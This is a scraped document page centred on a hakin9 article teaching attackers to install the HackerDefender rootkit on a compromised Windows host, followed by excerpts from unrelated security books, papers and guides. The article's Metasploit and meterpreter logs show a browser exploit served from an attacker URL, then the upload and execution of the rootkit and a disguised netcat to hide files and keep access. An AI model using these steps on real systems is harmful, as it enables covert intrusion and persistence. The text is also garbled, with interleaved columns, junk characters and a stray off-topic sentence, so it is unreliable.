Hackerdefender Rootkit for the Masses

Total Page:16

File Type:pdf, Size:1020Kb

Hackerdefender Rootkit for the Masses HackerDefender Rootkit for the Masses Attack Chris Gates, CISSP, GCIH, C|EH, CPTS Diffi culty Every month attackers are handed the latest 0-day exploit on a silver platter. There are tons of sites that post the latest exploit and security professionals rush to see exactly how the new exploit can be used to gain access to a remote computer. ut simply gaining access to a system one how to actually use and deploy the rootkit. is not the main goal of the new type of My intention is to teach the reader how to set B organized attackers whose desire is to up a basic HackerDefender confi guration fi le, command their victims to do their bidding. It is and show a couple of easy methods to get the said in the security business that getting a shell rootkit on the victim’s machine. I will fi nish things on a box is easy, but keeping that shell is where off with how to interact with the rootkit using the real skill is at. There are several popular the backdoor client and a couple of backdoors methods of keeping access such as creating that were set up in the rootkit confi guration fi le. accounts, cracking passwords, trojans, back- I won’t be going too deeply into rootkit basics or doors and of course rootkits. In this article we theory, current state of rootkit advancements, or are going to discuss rootkits basics and focus recovery from a rootkit level compromise. What specifi cally on using the HackerDefender[1] we will cover is actually deploying and interacting rootkit for Windows. Before we start lets quickly cover who I am and what I hope to accomplish with this article. What will you learn... I am not a rootkit writer or developer. I am se- • How to use Hacker Defender rootkit curity consultant, and I teach security courses. • Hiding fi les, processes, & registry keys I have taken and taught numerous hacking • Using the backdoor client. courses and hold several hacking certificertifi caca-- tions. Most of these courses sum up rootkits in a couple of paragraphs with links to the rootkit’s What you should know... homepage and tell you to basically fi gure it out for yourself. Time and time again I have watched • How to use Windows and the Windows fi le sys- really motivated students come to a screeching tem halt when it comes time to work with rootkits, • The basics of Windows rootkits because the documentation that is publicly • Windows command line. available does a horrible job at teaching some- 2 hakin9 6/2007 www.hakin9.org/en Rootkit with the rootkit once the initial system compromise has taken place. I will Listing 1. Running a clients-side exploit and getting our meterpreter attempt to point the reader to further shell resources on topics outside the basic SegFault:~/framework-3.0/framework-dev CG$ ./msfconsole ____________ scope of this article. Our goal is to < metasploit > help the reader with the So, now what do I do? question after downloading ------------ HackerDefender. \ ,__, \ (oo)____ (__) )\ An overview of Rootkits ||--|| * The shortest defi nition of a rootkit =[ msf v3.1-dev is software that allows an attacker + – --=[ 201 exploits – 106 payloads to mask his presence on a system + – --=[ 17 encoders – 5 nops while allowing the attacker access to =[ 39 aux msf > use exploit/windows/browser/logitech_videocall_removeimage the system at a later time. The term msf exploit(logitech_videocall_removeimage) > set TARGET 0 rootkit originally referred to a collec- TARGET => 0 tion of tools used to gain and keep msf exploit(logitech_videocall_removeimage) > set PAYLOAD windows/ administrative access on UNIX sys- meterpreter/bind_tcp tems. These tools usually included PAYLOAD => windows/meterpreter/bind_tcp msf exploit(logitech_videocall_removeimage) > set URIPATH hakin9/ trojaned or modifi ed copies of im- URIPATH => hakin9/ portant system binaries that were msf exploit(logitech_videocall_removeimage) > exploit modifi ed to hide the actions of an [*] Using URL: http://192.168.0.100:8080/hakin9/ unauthorized user from the system [*] Server started. administrators. With Microsoft Win- [*] Exploit running as background job. msf exploit(logitech_videocall_removeimage) > dows, rootkits have a narrower defi - [*] Started bind handler nition. Rootkits in Windows refers to [*] Transmitting intermediate stager for over-sized stage...(89 bytes) programs that use system hooking or [*] Sending stage (2834 bytes) modifi cation to hide fi les, processes, [*] Sleeping before handling stage... registry keys, and other objects in or- [*] Uploading DLL (81931 bytes)... [*] Upload completed. der to hide programs and behaviors. [*] Meterpreter session 1 opened (192.168.0.100:53985 -> 192.168.0.114:4444) In particular, Windows rootkits do not msf exploit(logitech_videocall_removeimage) > sessions -i 1 necessarily include any functionality [*] Starting interaction with 1... to gain administrative privileges. In meterpreter > fact, many Windows rootkits require Listing 2. Uploading our HackerDefender.exe, HackerDefender.ini, and administrative privileges to even renamed netcat via function [2]. Metasploit’s meterpreter meterpreter > pwd It is important to note that rootkits C:\WINDOWS\system32 are not exploits. Rather, rootkits are meterpreter > cd .. used after the initial exploit to main- meterpreter > cd Help tain access. It is generally not the meterpreter > pwd payload of an exploit, but it may be C:\WINDOWS\Help meterpreter > mkdir hxdef the end result of the attack. Creating directory: hxdef Rootkits, once installed, can: meterpreter > cd hxdef meterpreter > pwd • Hide processes C:\WINDOWS\Help\hxdef • Hide fi les and their contents meterpreter > upload hxdef100.exe hxdef100.exe [*] uploading : hxdef100.exe -> hxdef100.exe • Hide registry keys and their con- [*] uploaded : hxdef100.exe -> hxdef100.exe tents meterpreter > upload hxdef100.ini hxdef100.ini • Hide open ports and communica- [*] uploading : hxdef100.ini -> hxdef100.ini tion channels [*] uploaded : hxdef100.ini -> hxdef100.ini • Capture keyboard strokes (key meterpreter > cd .. meterpreter > cd .. logger) meterpreter > cd system32 • Sniff passwords in a local area meterpreter > upload mstftp.exe mstftp.exe network [*] uploading : mstftp.exe -> mstftp.exe [*] uploaded : mstftp.exe -> mstftp.exe Rootkits can be broken down into meterpreter > two general categories, because www.hakin9.org/en hakin9 6/2007 3 Attack they can operate at two different Listing 3. Running HackerDefender and seeing that the fi les are now levels: user mode (application) and hidden even to meterpreter kernel rootkits. meterpreter > cd Help meterpreter > cd hxdef meterpreter > pwd User mode rootkits C:\WINDOWS\Help\hxdef User mode rootkits involve system hooking or intercepting API calls in meterpreter > ls the user or application space. When- ever an application makes a system Listing: C:\WINDOWS\Help\hxdef call, the execution of that system call ================= follows a predetermined path. A Win- Mode Size Type Last modifi ed Name dows rootkit can hijack the system call ---- ---- ---- ------------- ---- at many points along that path and 40777/rwxrwxrwx 0 dir Wed Dec 31 17:00:00 MST 1969 . inject or change the values of those .. system calls to hide its presence. 100777/rwxrwxrwx 70656 fi l Wed Dec 31 17:00:00 MST 1969 hxdef100.exe 100666/rw-rw-rw- 4119 fi l Wed Dec 31 17:00:00 MST 1969 hxdef100.ini Examples of user mode rootkits are: HE4Hook [3], Vanquish [4], and meterpreter > execute -f hxdef100.exe HackerDefender. Process 1700 created. meterpreter > pwd C:\WINDOWS\Help\hxdef Kernel mode rootkits meterpreter > ls While all user mode rootkits change the behavior of the operating system Listing: C:\WINDOWS\Help\hxdef by hooking API functions or replac- ============================== ing core system commands, kernel based rootkits may change the Mode Size Type Last modifi ed Name ---- ---- ---- ------------- ---- behavior of the operating system or 40777/rwxrwxrwx 0 dir Wed Dec 31 17:00:00 MST 1969 . modify some kernel data structures .. by system hooking or modifi cation in kernel space. It is important to note meterpreter > that, before modifying a kernel, an at- tacker has to gain an access to kernel ������������ �������� ���������� ���������������� ����������� ��������������� ������� �������� ��������������� ��������������� �������� �������������������������� �������������������� �������������� ���������� ������������������ ������������� ��������������� ����������� ������ ��������� ��������� ������ ������������ ������������������������� ��������������������������������� ���� ������ ����� �������� ������� ��� ������ ������ ���������� ������� ������ ������� ��������� ��������� ����� ������� ������� ���� ��������� ������ ����� ���������� ���� ������� ��� �������� �������� �������� ������� ������ ������� ��������������������������� ����������������������������������� Figure 1. User Mode space and Kernel Mode space under Windows 4 hakin9 6/2007 www.hakin9.org/en Rootkit memory. Kernel space is generally memory. Hooking at the kernel level level applications rely on the kernel to off-limits to non-system level users. is the ideal place for system hooking pass them information, if you control One must have the appropriate rights and for evading detection, because it the information that is passed to in order to view or modify kernel is at the lowest level. Because upper them, you can easily hide information and processes. A common technique for hiding the presence of a malware's process is to remove the process from the kernel's list of active proc- esses. Since process management APIs rely on the
Recommended publications
  • Rootkit- Rootkits.For.Dummies 2007.Pdf
    01_917106 ffirs.qxp 12/21/06 12:04 AM Page i Rootkits FOR DUMmIES‰ 01_917106 ffirs.qxp 12/21/06 12:04 AM Page ii 01_917106 ffirs.qxp 12/21/06 12:04 AM Page iii Rootkits FOR DUMmIES‰ by Larry Stevenson and Nancy Altholz 01_917106 ffirs.qxp 12/21/06 12:04 AM Page iv Rootkits For Dummies® Published by Wiley Publishing, Inc. 111 River Street Hoboken, NJ 07030-5774 www.wiley.com Copyright © 2007 by Wiley Publishing, Inc., Indianapolis, Indiana Published by Wiley Publishing, Inc., Indianapolis, Indiana Published simultaneously in Canada No part of this publication may be reproduced, stored in a retrieval system or transmitted in any form or by any means, electronic, mechanical, photocopying, recording, scanning or otherwise, except as permit- ted under Sections 107 or 108 of the 1976 United States Copyright Act, without either the prior written permission of the Publisher, or authorization through payment of the appropriate per-copy fee to the Copyright Clearance Center, 222 Rosewood Drive, Danvers, MA 01923, (978) 750-8400, fax (978) 646-8600. Requests to the Publisher for permission should be addressed to the Legal Department, Wiley Publishing, Inc., 10475 Crosspoint Blvd., Indianapolis, IN 46256, (317) 572-3447, fax (317) 572-4355, or online at http://www.wiley.com/go/permissions. Trademarks: Wiley, the Wiley Publishing logo, For Dummies, the Dummies Man logo, A Reference for the Rest of Us!, The Dummies Way, Dummies Daily, The Fun and Easy Way, Dummies.com, and related trade dress are trademarks or registered trademarks of John Wiley & Sons, Inc. and/or its affiliates in the United States and other countries, and may not be used without written permission.
    [Show full text]
  • La Sécurité Informatique Edition Livres Pour Tous (
    La sécurité informatique Edition Livres pour tous (www.livrespourtous.com) PDF générés en utilisant l’atelier en source ouvert « mwlib ». Voir http://code.pediapress.com/ pour plus d’informations. PDF generated at: Sat, 13 Jul 2013 18:26:11 UTC Contenus Articles 1-Principes généraux 1 Sécurité de l'information 1 Sécurité des systèmes d'information 2 Insécurité du système d'information 12 Politique de sécurité du système d'information 17 Vulnérabilité (informatique) 21 Identité numérique (Internet) 24 2-Attaque, fraude, analyse et cryptanalyse 31 2.1-Application 32 Exploit (informatique) 32 Dépassement de tampon 34 Rétroingénierie 40 Shellcode 44 2.2-Réseau 47 Attaque de l'homme du milieu 47 Attaque de Mitnick 50 Attaque par rebond 54 Balayage de port 55 Attaque par déni de service 57 Empoisonnement du cache DNS 66 Pharming 69 Prise d'empreinte de la pile TCP/IP 70 Usurpation d'adresse IP 71 Wardriving 73 2.3-Système 74 Écran bleu de la mort 74 Fork bomb 82 2.4-Mot de passe 85 Attaque par dictionnaire 85 Attaque par force brute 87 2.5-Site web 90 Cross-site scripting 90 Défacement 93 2.6-Spam/Fishing 95 Bombardement Google 95 Fraude 4-1-9 99 Hameçonnage 102 2.7-Cloud Computing 106 Sécurité du cloud 106 3-Logiciel malveillant 114 Logiciel malveillant 114 Virus informatique 120 Ver informatique 125 Cheval de Troie (informatique) 129 Hacktool 131 Logiciel espion 132 Rootkit 134 Porte dérobée 145 Composeur (logiciel) 149 Charge utile 150 Fichier de test Eicar 151 Virus de boot 152 4-Concepts et mécanismes de sécurité 153 Authentification forte
    [Show full text]
  • What Are Kernel-Mode Rootkits?
    www.it-ebooks.info Hacking Exposed™ Malware & Rootkits Reviews “Accessible but not dumbed-down, this latest addition to the Hacking Exposed series is a stellar example of why this series remains one of the best-selling security franchises out there. System administrators and Average Joe computer users alike need to come to grips with the sophistication and stealth of modern malware, and this book calmly and clearly explains the threat.” —Brian Krebs, Reporter for The Washington Post and author of the Security Fix Blog “A harrowing guide to where the bad guys hide, and how you can find them.” —Dan Kaminsky, Director of Penetration Testing, IOActive, Inc. “The authors tackle malware, a deep and diverse issue in computer security, with common terms and relevant examples. Malware is a cold deadly tool in hacking; the authors address it openly, showing its capabilities with direct technical insight. The result is a good read that moves quickly, filling in the gaps even for the knowledgeable reader.” —Christopher Jordan, VP, Threat Intelligence, McAfee; Principal Investigator to DHS Botnet Research “Remember the end-of-semester review sessions where the instructor would go over everything from the whole term in just enough detail so you would understand all the key points, but also leave you with enough references to dig deeper where you wanted? Hacking Exposed Malware & Rootkits resembles this! A top-notch reference for novices and security professionals alike, this book provides just enough detail to explain the topics being presented, but not too much to dissuade those new to security.” —LTC Ron Dodge, U.S.
    [Show full text]
  • Vmwatcher.Pdf
    Stealthy Malware Detection and Monitoring through VMM-Based “Out-of-the-Box” 12 Semantic View Reconstruction XUXIAN JIANG North Carolina State University XINYUAN WANG George Mason University and DONGYAN XU Purdue University An alarming trend in recent malware incidents is that they are armed with stealthy techniques to detect, evade, and subvert malware detection facilities of the victim. On the defensive side, a fundamental limitation of traditional host-based antimalware systems is that they run inside the very hosts they are protecting (“in-the-box”), making them vulnerable to counter detection and subversion by malware. To address this limitation, recent solutions based on virtual machine (VM) technologies advocate placing the malware detection facilities outside of the protected VM (“out-of- the-box”). However, they gain tamper resistance at the cost of losing the internal semantic view of the host, which is enjoyed by “in-the-box” approaches. This poses a technical challenge known as the semantic gap. In this article, we present the design, implementation, and evaluation of VMwatcher—an “out- of-the-box” approach that overcomes the semantic gap challenge. A new technique called guest view casting is developed to reconstruct internal semantic views (e.g., files, processes, and ker- nel modules) of a VM nonintrusively from the outside. More specifically, the new technique casts semantic definitions of guest OS data structures and functions on virtual machine monitor (VMM)- level VM states, so that the semantic view can be reconstructed. Furthermore, we extend guest view casting to reconstruct details of system call events (e.g., the process that makes the system This work was supported in part by the US National Science Foundation (NSF) under Grants CNS-0716376, CNS-0716444 and CNS-0546173.
    [Show full text]
  • MARK RUSSINOVICH Chief Technology Officer Microsoft Azure
    MARK RUSSINOVICH is the CTO of Microsoft Azure. He was a co-founder of software producers Winternals before it was acquired by Microsoft in 2006. Russinovich earned his B.S. in computer engineering from Carnegie Mellon Uni- versity in 1989 and M.S. in computer cngineering from Rensselaer Polytechnic Institute. He later returned to CMU, and received a Ph.D. in computer engineer-ing on Application-transparent fault manage- ment in 1994, under the supervision of Zary Segall. From 1994 through early 1996 Russinovich was a research associate with the University of Oregon's computer science department and then joined NuMega Technologies as a developer, working on performance monitoring software for Window NT. In 1996, he and Bryce Cogswell cofounded Winternals Software, where Russinovich served as Chief Software Architect, and the web site sysinternals.com, where he wrote and published dozens of popular Windows administration and diagnostic utilities in- cludeing Autoruns, Filemon, Regmon, Process Explorer, TCPView, and RootkitRevealer among many others. In 1997 he worked as a consulting associate at OSR Open Systems Resources, Inc. and then joined IBM's Thomas J. Watson Research Center as a research staff member, re- searching operating system support for Web server acceleration and serving as an oper- ating systems expert. Russinovich joined Microsoft in 2006, when it acquired Most existing blockchain protocols fail to meet several key enterprise requirements, including Winternals Software. con-fidentiality, acceptable transaction throughput and latency, computational efficiency (e.g. In his role as an author, he is a regular energy costs for proof-of-work consensus), and effective governance.
    [Show full text]
  • Hidden Rootkits in Windows
    Prepared by: CMS Consulting Inc. September 2005 Confidential CMSCMS ConsultingConsulting Inc.Inc. Hidden Rootkits in Windows Presented by: Brian Bourne, CISSP, MCSE:Security Christopher Diachok, MCSE CMS Consulting Inc. Microsoft Infrastructure and Security Experts Active Directory - Windows Server - Exchange - SMS - ISA MOM - Clustering - Office - XP - SQL - Terminal Services Office - Security Assessments - Lockdown - Wireless Clients Include Microsoft Canada - Dell - CIBC - RBC - PwC - Sears - Government Agencies - CFL - Ontario Hospitals - Take Two Interactive Visit us online: www.cms.ca Downloads – Resources – White Papers For Security Solutions For Advanced Infrastructure For Network Solutions AGENDA •Overview • Types of rootkits • Popular rootkits • What can they hide • DEMO – Hacker Defender Anatomy 101 • How they hide and go undetected • DEMO - Hacker Defender In Action! • DEMO – Covert Channels • Detection • DEMO – Rootkit Revealer • Protection and Removal • Trends Overview • What is a rootkit? – A root kit is a set of tools used by an intruder after cracking a computer system. These tools can help the attacker maintain his or her access to the system and use it for malicious purposes. Root kits exist for a variety of operating systems such as Linux, Solaris, and versions of Microsoft Windows Reference: http://en.wikipedia.org/wiki/Rootkit Types of rootkits • Persistent Rootkits A persistent rootkit is one associated with malware that activates each time the system boots. Because such malware contain code that must be executed automatically each system start or when a user logs in, they must store code in a persistent store, such as the Registry or file system, and configure a method by which the code executes without user intervention.
    [Show full text]
  • Fast User-Mode Rootkit Scanner for the Enterprise Yi-Min Wang and Doug Beck – Microsoft Research, Redmond
    Fast User-Mode Rootkit Scanner for the Enterprise Yi-Min Wang and Doug Beck – Microsoft Research, Redmond ABSTRACT User-mode resource hiding through API interception and filtering is a well-known technique used by malware programs to achieve stealth. Although it is not as powerful as kernel-mode techniques, it is more portable and reliable and, as a result, widely used. In this paper, we describe the design and implementation of a fast scanner that uses a cross-view diff approach to detect all user-mode hiding Trojans and rootkits. We also present detection results from a large-scale enterprise deployment to demonstrate the effectiveness of the tool. Introduction malware programs for which commercial anti-virus scanners already have signatures. Finally, while the The term ‘‘rootkit’’ generally refers to the class of stealth malware programs that hide ‘‘resources’’ major strength of anti-virus software is to detect and from the operating system resource-enumeration APIs. automatically remove known-bad malware programs For example, a rootkit may be used to hide critical without user intervention, corporate security organiza- executable files from anti-virus scanners, to hide criti- tions in large enterprises often need to investigate cal Windows Registry entries from experienced sys- every rootkit infection case to assess potential dam- tem administrators using programs such as RegEdit, ages and prevent future infections; automatic removal and to hide critical processes from average users run- is often not desirable. ning Windows Task Manager. By making critical We previously proposed a non-signature, diff- resources ‘‘invisible’’ to the APIs and the system utili- based approach to rootkit detection, called Ghost- ties that make use of such APIs, rootkits have a much Buster [WVR+04].
    [Show full text]
  • Incident Response Tools James Madison University Dept
    Incident Response Tools James Madison University Dept. of Computer Science June 13, 2015 1 Introduction Being successfully attacked is inevitable. A determined hacker WILL be able to penetrate your network. The attacker, if they want to re-enter your network, will have to leave a backdoor somewhere. This means they will likely re-add guest accounts, disable firewall ports, and re-enable services that you had previously disabled (in the Windows Security Exercise...like FTP) to provide a means for them to access your computer easily. In this chapter, we will briefly re-examine things talked about in Windows Security Exercise that are relevant after an incident and then we will cover new tools that will help you investigate an incident. All tools necessary are available on the Desktop of your IR Tools snapshot. 2 Services Knowing what services are running on your windows machine is very important, especially after being attacked. Having extra services running that are not necessary may add vulnerabilities to your machine and may allow an attacker to re-enter your network. The more services that are running on a machine means the more services you must protect and secure. By default, many software packages install many extra side services you do not want to be running, and as good network administrator you must be aware of these. 2.1 What Services are running? All Microsoft Windows Server Editions have a Graphical User Interfaces to help manage the machines services. The GUI to manage what services are running can be accessed in the Start Menu under Administrative Tools by clicking on Services.
    [Show full text]
  • Compliments of Edited by Linda Mccarthy and Denise Weldon-Siviy
    Compliments of Edited by Linda McCarthy and Denise Weldon-Siviy page press Smart Books for Smart People® The author and publisher have taken care in the preparation of this book, but make no expressed or implied warranty of any kind and assume no responsibility for errors or omissions. No liability is assumed for incidental or consequential damages in connection with or arising out of the use of the information or programs contained herein. All trademarks are the property of their respective owners. Publisher: Linda McCarthy Editor in Chief: Denise Weldon-Siviy Managing Editor: Linda McCarthy Cover designer: Alan Clements Cover artist: Nina Matsumoto Interior artist: Heather Dixon Web design: Eric Tindall and Ngenworks Indexer: Joy Dean Lee Interior design and composition: Kim Scott, Bumpy Design Content distribution: Keith Watson The publisher offers printed discounts on this book when ordered in quantity for bulk purchases, or special sales, which may include electronic versions and/or custom covers and content particular to your business, training, goals, marketing focus, and branding interests. For more information, please contact: U.S. Corporate and Education Sales (510) 220-8865 Except where otherwise noted, content in this publication is licensed under the Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License, available at http://creativecommons.org/licenses/by-sa/3.0/us/legalcode. ISBN 978-0-615-37366-9 Library of Congress Cataloging-in-publication Data McCarthy, Linda Own your space : keep yourself and your stuff safe online / Linda McCarthy. ISBN 978-0-615-37366-9 (electronic) 1. Computer security. 2. Computers and children.
    [Show full text]
  • High Security Technologies for Embedded Systems Based Digital Game
    High Security Technologies for Embedded Systems Based Digital Game 吳佳鑫、曹偉駿 E-mail: [email protected] ABSTRACT With the development of the Internet, digital online games and arcade games have become important entertainments in the recent years, and therefore the development of digital games industry has become increasingly significant. The security issues encountered by the digital games industry include hacker attacks, cheating in online games, and stealing and changing of communication packets. The destructive effects from cheating in online games and stealing packets can be as minor as financial losses for game makers to as severe as digital games generating minimal interest and facing bankruptcy risks. A comprehensive survey of security mechanisms employed by the current digital games industry indicates that the machanisms cannot provide high security while maintaining low costs, leading to the limited prevalence of relevant security mechanisms. The purpose of this thesis is to ensure the benefits of both players and game companies, even when they are without security concepts. This thesis develops a highly hidden rootkit technology to achieve the protection of embedded systems’ communication for online games. Although the current rootkit technology is used to attack computer systems by hackers, which lets users be undetectable, it can also be used to protect systems security. Accordingly, this thesis develops new rootkit technologies to protect the transmissions of data digital game packets based on the hidden characteristics of rootkit. More specifically, this thesis uses the technology of DKOM (Direct Kernel Object Manipulation) to hide game data in users’ Windows embedded operating systems. The above-mentioned technologies can let illegal users be unable to intercept data and make cheating to attack digital online games.
    [Show full text]
  • Malware Removal Guide
    MALWARE REMOVAL GUIDE Malware Detection and Removal on Windows There are a number of free tools that can help with this. None of them are perfect, and none of them will detect 100% of all known malware- so the important thing is to use all of them in the hope that the overlap of their detection is enough to remove the problem. However, it is still very possible that no tool will be able to detect and/or clean the malware. In this instance it is possible that an “expert” may be able to manually work out where the malware is hiding and how to remove it – however, the easiest solution is likely to be a rebuild. Always Suggest Password Changing Please note that it's worth suggesting password changing to the users regardless of what is found. If anything that might be a major security risk is found - in particular keystroke loggers, rootkits, remote admin kits, etc - the user, and any other user of the machine, must change their passwords for all services that they may have used on that system, and local passwords for all users – including Administrator – on the system itself. If they do online banking or credit/debit card purchases they should also inform their banks, and follow the exact procedures given by them – this is vitally important. When to suspect malware Definitely suspect malware if the user reports unexpected popups, browsers going to sites other than the ones they were actually trying to go to, and similar problems. Also suspect it if you spot software associated with peer-to-peer filesharing; traditionally such software tends to have malware included.
    [Show full text]
  • Incident Response Tools
    Incident Response Tools James Madison University Dept. of Computer Science June 13, 2013 1 Introduction Being successfully attacked is inevitable. A determined hacker WILL be able to penetrate your network. The attacker, if they want to re-enter your network, will have to leave a backdoor somewhere. This means they will likely re-add guest accounts, disable firewall ports, and re-enable services that you had previ- ously disabled (in the Windows Security Exercise...like FTP) to provide a means for them to access your computer easily. In this chapter, we will briefly re-examine things talked about in Windows Security Exercise that are relevant after an incident and then we will cover new tools that will help you investigate an incident. All tools necessary are available on the Desktop of your IR Tools snapshot. 2 Services Knowing what services are running on your windows machine is very impor- tant, especially after being attacked. Having extra services running that are not necessary may add vulnerabilities to your machine and may allow an attacker to re-enter your network. The more services that are running on a machine means the more services you must protect and secure. By default, many soft- ware packages install many extra side services you do not want to be running, and as good network administrator you must be aware of these. 2.1 What Services are running? All Microsoft Windows Server Editions have a Graphical User Interfaces to help manage the machines services. The GUI to manage what services are running can be accessed in the Start Menu under Administrative Tools by clicking on Services.
    [Show full text]